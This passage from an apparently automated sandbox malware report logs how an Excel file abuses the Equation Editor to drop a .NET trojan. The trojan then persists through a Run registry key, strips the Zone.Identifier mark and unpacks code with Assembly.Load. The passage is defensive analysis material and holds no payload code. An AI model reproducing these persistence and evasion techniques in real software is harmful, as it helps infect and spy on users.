                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D8698
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DE328
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9B21
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9B30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D6300
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D3FA8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DAF98
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DAFC8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_00470048
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 6_2_008B6091
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 6_2_002052B8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 6_2_002062D0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 6_2_00205600
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E6889
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE8F8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E3D08
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E55A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E5E22
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE630
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E425F
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EBEE2
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EEB33
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E0308
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E2B60
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EC3AA
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9F88
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E77E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E101A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E587A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE8E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9901
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9910
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002ECD68
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9DA0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9D92
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB5F5
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E49F0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB5C0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAA28
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EB638
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9271
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EC6A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E86A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9280
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E8698
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EE328
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9B21
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E9B30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002E3FA8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAF98
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_002EAFC8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 7_2_003F0048
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E52B8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E62D0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 8_2_001E5600
                      Source: joewealthx[1].exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Nwefile.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 4.2.joewealth28743.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.joewealth28743.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.2.Nwefile.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.2.Nwefile.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.Nwefile.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.Nwefile.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@12/4@14/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$99feb78a_by_Libranalysis.xlsxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA67.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 99feb78a_by_Libranalysis.xlsxVirustotal: Detection: 39%
                      Source: 99feb78a_by_Libranalysis.xlsxReversingLabs: Detection: 43%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe'
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 99feb78a_by_Libranalysis.xlsxInitial sample: OLE indicators vbamacros = False

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: joewealthx[1].exe.1.dr, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.joewealth28743.exe.ef0000.0.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.2.joewealth28743.exe.ef0000.2.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: Nwefile.exe.4.dr, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.joewealth28743.exe.ef0000.4.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.joewealth28743.exe.ef0000.0.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.Nwefile.exe.8b0000.1.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.2.Nwefile.exe.8b0000.3.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 6.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.Nwefile.exe.8b0000.1.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.Nwefile.exe.8b0000.0.unpack, MainForm.cs.Net Code: _N_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: joewealthx[1].exe.1.drStatic PE information: 0xEA4C358C [Sun Jul 25 02:23:08 2094 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.29768214208
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.29768214208
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\joewealth28743.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NwefileJump to behavior
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NwefileJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
